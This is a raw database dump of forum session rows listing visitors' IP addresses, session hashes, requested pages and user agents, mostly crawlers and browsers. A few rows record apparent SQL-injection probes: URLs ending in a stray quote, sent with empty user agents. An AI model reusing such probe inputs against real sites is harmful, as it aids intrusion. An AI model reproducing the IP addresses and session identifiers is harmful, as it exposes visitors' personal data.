('b91cebd9c2a71822b0f973f2bdf2c574', 0, '172.68.11.252', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475232915, '/showthread.php?p=1141&mode=threaded', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8d286a226d3a96147c5aa7956a1597f9', 0, '100.4.182.124', '801bfbd352267ecfd52702a39104f75d', 1467073389, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('74d382817ea4d8bd4e14d44bef3f32ef', 0, '172.68.11.245', 'e1946f3479af5986090c403b952e9e66', 1467084426, '/index.php', 'Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d6ae0455caf88c60806072f365debfd7', 0, '5.101.65.184', '33d416bbed0e4583bf73667e8ddfb8fb', 1467085063, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('edb84f5299510279a710d24602df53ac', 0, '14.1.81.243', 'c89bc1c9fd12870e925e60fc6c9eeee6', 1467086834, '/showthread.php?p=2697', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('dadf7873692aeef0d5c3f9dee526064d', 0, '95.25.181.8', '438e06cbd3b17c43ee3e9935f385a9f2', 1467090567, '/announcement.php?f=37', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8537e2754b122a6e84dc136e4084b1ff', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467091362, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('e5bb8412d1d4396ad402920adf065865', 0, '151.18.100.52', 'af84faf9cc6dd0a4962e9d9be08816c2', 1474216309, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0; JERRY Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('51d2b0c0395a7e8a976659c1941f093f', 0, '62.210.14.143', 'cd24ae8a7e11045f59130b97968fd0e5', 1467103579, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.3.4000 Chrome', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('51abd5227c992dfda5f9329549ce8328', 0, '2a02:598:2::162', '57325b7bdb632e9523f9ba60e7f2ba4c', 1469963277, '/online.php?', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('38a05d1a309ed676d5807b76ead254ac', 0, '178.137.166.125', '2fc857259c935331cbca62893d8cce74', 1467112602, '/index.php', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d7896f8296325f7b79fb17cc15a5960a', 0, '192.40.92.214', 'f9e6196cc64179bc83bf24fbf95a8d27', 1467116573, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.3.4000 Chrome', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('df2268afd8da73f34aead28b0e150848', 0, '172.68.11.204', '623363c6daf8ae06fe8504bb54b04533', 1467122286, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fd3061f4eb4bd0ad56ad553d8899da21', 0, '178.62.217.233', '3db64bbef9bd8d836490920b44bced19', 1467120761, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e6980d84dad4a8e0b68691fd1354aec3', 0, '195.211.23.206', 'cfa4db89b5b86ec4623e9ff73680d0b3', 1467122312, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a6c519fd4196b2917c87439c951eeb97', 0, '31.173.86.123', '6c4a09195fac64be504963122b5052eb', 1467122328, '/register.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Ver', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a92e53632c0b2661fc7c65a329df2685', 0, '78.10.55.221', '18f726f2d2de18d0a97ed8ecb0aa5bc6', 1467133849, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('477c060735ab7b144cf0b9f63b31de9d', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467134096, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('27c31ce0d94730a00e77fc9c6898ac1c', 0, '207.241.225.246', '9d0b3cf908a290b79727e65f3b099c80', 1473545570, '/showthread.php?t=1841', 'Mozilla/5.0 (compatible; archive.org_bot; Wayback Machine Live Record; +http://archive.org/details/a', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('27183e94957c3d32484b546854d541b5', 0, '207.241.226.233', '6fffbe8f2087da04ca982e209b239d2d', 1467140569, '/archive/index.php/t-2346.html', 'Mozilla/5.0 (compatible; archive.org_bot; Wayback Machine Live Record; +http://archive.org/details/a', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('28e8c1110575ebd585d8e3458363fd0d', 0, '93.136.12.184', '1c0c7df2a1646e9025eabbc6fecf1951', 1467139660, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('eeeefabd0e9b9210f4962f60d0c6b5cd', 0, '66.249.93.93', '4ba716af5b8bea16189371bb0478ad62', 1467140128, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0,gzip(gfe)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5afb20d5e1568bc634d90907dfb2e70a', 0, '207.241.226.216', '6fffbe8f2087da04ca982e209b239d2d', 1467140722, '/showthread.php?t=2346', 'Mozilla/5.0 (compatible; archive.org_bot; Wayback Machine Live Record; +http://archive.org/details/a', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4611a2ab3847f77b10442ef41e910b85', 0, '172.68.34.93', '8c2a58ed4130be298d50116da95b8cf5', 1469567037, '/showthread.php?t=1835', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0afb6dbd301a07feea7e6f9b416dea73', 0, '194.95.142.180', '6fda53ecb87eebc9ae78dfe6c3f2d779', 1467141109, '/showthread.php?t=2347', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e3d211132f68d23ec5cedc1aba7018b9', 0, '2a02:587:3108:c', 'bb3e9da9293b62f6005b4d0c0ebd7d59', 1467170137, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('aae0862c9c99973bc6a403aa5019ca7b', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467177240, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('74a94cb562504af844adfd13260d83d1', 0, '39.40.226.91', 'd035026b0be5738bc245e74cc02fa024', 1467184841, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.4.600 Chrome/', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3c2831514eb05d1e6ea770e73397475c', 0, '172.68.34.57', 'dce73380cf0fd3aff82da93d9252bb04', 1467185863, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5a824214849baac948349f24941feadd', 0, '207.46.13.99', '5e207e311e22cdc3b2095126a922fa93', 1470547743, '/search.php?searchthreadid=2342', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bff57627f205b4b194fea5f44d732f3d', 161, '172.68.29.181', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1467189356, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('19ea84d4dd12344fbdf44fa69ebfee25', 0, '157.55.39.213', '23f3103f44bc3badcba53554e5e4cb6d', 1467367553, '/archive/index.php?pda=1', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('baf84787a836281e64af75f68deba036', 0, '157.55.39.46', '23f3103f44bc3badcba53554e5e4cb6d', 1467367572, '/misc.php?do=showsmilies', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7fc5a3372ad0173a66d01bbfd4c2c411', 0, '172.68.34.49', 'dce73380cf0fd3aff82da93d9252bb04', 1469616444, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9c39faf9efb2cfd2b5be77d3a6424495', 0, '172.68.11.244', '54fe18c99e79a2671eb7a5764ccbbb4c', 1471361261, '/misc.php?do=whoposted&t=1657', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f09dfdd425514654069d89ebb36d0892', 0, '88.69.205.199', '6cd369ab6f45ae908d5b6ec5dd4d7786', 1467207810, '/login.php?do=login&do=login', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Ver', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bc76b664173bcbf43a2ee02152f9cf6d', 0, '176.8.10.29', '7c56aaf41b83879c443b4e87f69e6f7c', 1467217497, '/search.php?searchthreadid=2483\'', '', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f469eb4526155f901ed771ad1d8acf3d', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467220103, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('56b42d17a7841def618998e291fc1028', 0, '8.31.249.42', '2ca4b04a2224549bdafa789f2910baf9', 1467223465, '/showthread.php?t=1841', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5808bff3f7a2a901802d96f06fef25c0', 0, '181.49.143.14', '81be1a2eaa3b0fd02686762bc3c83df1', 1474214833, '/index.php', 'python-requests/2.10.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('732bc257f8b91adae421503418bd9618', 0, '217.160.141.241', 'd86ab2985da26cc8c3b6d60481cdae99', 1467232265, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.10', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e1f63dbb636974601f373efc9cdce632', 0, '39.40.226.91', '833d4b65bb57e5125a9992dbe7c7a60e', 1467232606, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2a116958b174849d16dbaa5cedddf067', 0, '93.73.193.85', '090b1f484556bd889c4d3ed438b5d719', 1467235837, '/showthread.php?p=2988', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6de8a51235c680cc42da8f8f7b18688a', 0, '172.68.10.199', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475278736, '/showthread.php?p=2833&mode=linear', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('530ca4eeb1e9c59794507fb4a47fcbff', 0, '172.68.10.249', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1467253996, '/showthread.php?p=2044', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b87b999e95cfc2142b644fea599905c9', 278, '190.228.247.13', '588a3683072cdb34e5b7ad36d989e24d', 1467256309, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('3b9d95939618cd63300e0563424abee1', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467263208, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('d384df4ffe1bdeefae37827e4a8acb35', 0, '172.68.10.201', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1475338641, '/showthread.php?t=2393', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('20946e73fae099fb60e1482c41424f7f', 0, '172.68.11.240', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1467276332, '/member.php?u=183', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a2202ef7f54de106322056f30fdf9d81', 0, '172.68.10.236', '54fe18c99e79a2671eb7a5764ccbbb4c', 1471231830, '/showthread.php?t=2237', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('456d4f7565f5b845c3812b02e560b25e', 0, '172.68.10.241', '54fe18c99e79a2671eb7a5764ccbbb4c', 1474108728, '/showthread.php?p=2785', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c6418e9b9783130f340cba8d4e1c314e', 0, '172.68.11.242', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475139104, '/showthread.php?p=2876', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fb762572abee8b5b64ef334e2a403746', 0, '172.68.10.250', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475339236, '/showthread.php?t=2386', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f280f70c5662719c4f90401af363a43c', 0, '172.68.11.239', '54fe18c99e79a2671eb7a5764ccbbb4c', 1471361010, '/search.php?f=31', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('734b2356340bfab99256ed81ea30d660', 0, '172.68.11.240', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475293295, '/search.php?searchthreadid=2312', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8547efe84b962bc6bf1731f3001a2a7d', 0, '39.40.203.37', 'd5e374698dc833b4f06fca392a4abf47', 1467286327, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('705dda1419ad17940ca4f0530eb8a976', 0, '185.117.72.101', '0d8e40db51652756b582d846c7693982', 1467286453, '/register.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('40246f6d867f4137b518077054bbd58e', 0, '88.144.230.89', '45ca59a081402772402115916bb47fcb', 1467289093, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6c55274e16b0bb522201f5f1e668a8f5', 0, '172.68.10.204', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475181398, '/showthread.php?t=2314', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('15ecd78b6bbdd48a20469f33a4cb2f28', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467306264, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('e1b4f93f238a0349a8db3ed68dfbeb4d', 0, '69.181.134.185', '35faa0a3f08b939ddd5527ae2409422a', 1467306661, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.26', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('34a8530d5874dd7a23cc45f75a8b6638', 0, '5.255.250.25', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475285027, '/member.php?u=270', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8f27cdac2447b0869de1fd99b56bf1ec', 0, '141.8.143.234', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1475148229, '/forumdisplay.php?f=31', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d513269089c9217440b167304a47653b', 0, '220.181.108.180', 'e0be0d02a3feedbec5a39ff1c6306d81', 1467312752, '/index.php', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e44ff5f25c9a76e4d9719a7520cda179', 0, '78.45.149.122', '085e073c74964a66cf2dd33250c8271b', 1467315688, '/register.php', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('be23dd0b092e60a6d8b3e9577411aaa6', 0, '95.85.9.108', 'cea5d7dc95db68f59321a11ad1543c40', 1467323484, '/index.php', 'SafeDNSBot (https://www.safedns.com/searchbot)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('42681f8fb760d1179d97f88c3d094503', 0, '40.77.167.84', 'c5490a5a8e1813ac25cf9e19091dcb85', 1467452919, '/member.php?u=1', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('99e135c76e9aefa88069eb9a33f0956e', 0, '187.158.110.214', 'b1d861b96be84991f591a4bee70aa2b1', 1467334589, '/index.php', 'Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7cc347d9bc5b788d640d533fcc4eea19', 0, '172.68.34.80', '37a60411c341250cf0113f4eba911963', 1470280748, '/archive/index.php/t-1825.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('0cadf9bdf431a0b67004186f0eba9e4b', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467349410, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('87becff5828854e8fefeecad6de3cabd', 0, '207.46.13.72', '5e207e311e22cdc3b2095126a922fa93', 1472791207, '/search.php?searchthreadid=2342', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f324d046d06173765612eecff59ba87c', 0, '37.132.221.211', '449ecc66941467b8b4d08f33e25fbc93', 1474212906, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4783fae36b78695d0f962bbdb3fd0469', 0, '85.158.152.122', 'd223f3f5428825188bba5475cdcaf84d', 1467369587, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a4affe6518f676d80da24f09debf058d', 0, '119.81.124.80', '81554d7907bf6091ba5c62f6392ac73c', 1467373572, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4d0953afdcff7759e15d78e6e65566cc', 161, '172.68.29.181', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1467374599, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('b47e208e52ccea6a2a08920e38936a37', 0, '98.184.73.222', '68da3f7c80cbc483f97bbe63908a4c1f', 1467377667, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0b80ab7691a0fbc31949076e25502cc7', 0, '178.34.104.21', '2ec4fa3902132ba927aa328b39fadf02', 1467380248, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f4d6a33eb89098f655396b4f7c02b331', 0, '94.211.63.228', '9099294fad5c9feeca02ddf77a57a4f2', 1467380520, '/memberlist.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4645d0e38c3f295074180f8d11c45b6b', 0, '92.111.146.8', 'e627695270bf8a638b204b0545712c0f', 1467381772, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('57ef51d6e5d05cdeef14445d4a9bb7a3', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467392371, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('a76e6b30da246c66ace8480e72d865c7', 0, '172.68.25.66', '436c6352c1fa436675089aa41337fae2', 1467404071, '/search.php?searchthreadid=2483\'', '', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b2097b73b56536e4a13bf0bec08e16b1', 0, '85.56.13.130', '928939c9fb315ef5c2fdbd59611a670c', 1474206640, '/showthread.php?t=2346', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a7a0641a1cf27905d3646b902e2285b5', 0, '120.164.40.71', 'a920e8e913e3e3117b4445e1a5d7dd41', 1467407226, '/showthread.php?p=3046', 'Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; ASUS_T00I Build/KVT49L) AppleWebKit/534.30 (KHTML, like', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('329b1eb78e0bb1f1848867473e095911', 0, '91.224.178.69', '4911b4408793f4ed75692711193105e7', 1467407512, '/member.php?u=181\'', '', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9dc5ca989320d93f2e5344d7379e30c0', 0, '157.55.39.26', '23f3103f44bc3badcba53554e5e4cb6d', 1468755081, '/forumdisplay.php?f=37', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9b963d854074c4b3c248d16ca1c78fda', 0, '39.40.246.150', 'cc85798c52782ebf3fc1cd2266d7e947', 1467422072, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('47db9bf13b8d87cb23307d5836bbe08c', 0, '199.254.238.207', 'b56b464012e9c4b9af6ffbb89c34ed78', 1467422593, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bf6106b853b6bb045cf8229e390e8a70', 0, '172.68.11.205', '54fe18c99e79a2671eb7a5764ccbbb4c', 1471232821, '/showthread.php?p=2239', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7db370a8e59d02266bec10adca94ff36', 0, '172.68.11.199', '54fe18c99e79a2671eb7a5764ccbbb4c', 1469059838, '/member.php?u=372', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0ba9e4fa835ab1f01d288a27a20f1c87', 0, '172.68.10.246', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475187401, '/showthread.php?p=2796', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b5b1eae3d255a1c31124e744c44c880c', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467435605, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('05a86da40031dfa4b31a7f2cecd76b81', 0, '172.68.11.202', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475169899, '/member.php?u=170', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d12fb43269413b7640b5660f0c9c77fd', 0, '172.68.10.198', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475260357, '/showthread.php?p=2969', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('97f7b01c3f3563fcf957027b28634b81', 0, '172.68.11.238', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475159136, '/member.php?u=334', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6d794e95d1e187ed2c5e2f797e18bed8', 0, '172.68.10.248', '54fe18c99e79a2671eb7a5764ccbbb4c', 1470801638, '/showthread.php?mode=hybrid&t=2369', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
